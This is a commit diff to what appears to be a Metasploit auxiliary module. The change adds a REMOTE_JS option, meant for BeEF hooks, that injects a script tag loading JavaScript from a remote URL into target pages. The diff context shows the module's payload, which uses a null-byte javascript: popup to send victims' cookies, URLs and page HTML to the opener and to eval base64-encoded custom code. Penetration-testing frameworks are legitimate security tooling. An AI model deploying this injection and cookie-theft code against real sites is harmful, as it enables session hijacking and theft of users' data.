Add a REMOTE_JS datastore option for BeEf hooks etc.
parent
3e09283ce5
commit
59dfa624c4
|
@ -57,6 +57,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
"A string of javascript to execute in the context of the target URLs.",
|
||||
''
|
||||
]),
|
||||
OptString.new('REMOTE_JS', [
|
||||
false,
|
||||
"A URL to inject into a script tag in the context of the target URLs.",
|
||||
''
|
||||
]),
|
||||
OptBool.new('BYPASS_XFO', [
|
||||
false,
|
||||
"Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
|
||||
|
@ -123,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
var exploit = function(){
|
||||
window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
|
||||
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
|
||||
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
|
||||
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
|
||||
'));}void(0);', n);
|
||||
}
|
||||
if (!n) {
|
||||
|
@ -215,6 +220,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
"#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
|
||||
end
|
||||
|
||||
def custom_js
|
||||
rjs_hook + datastore['CUSTOM_JS']
|
||||
end
|
||||
|
||||
def rjs_hook
|
||||
remote_js = datastore['REMOTE_JS']
|
||||
if remote_js.present?
|
||||
"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
|
||||
else
|
||||
''
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
exploit
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue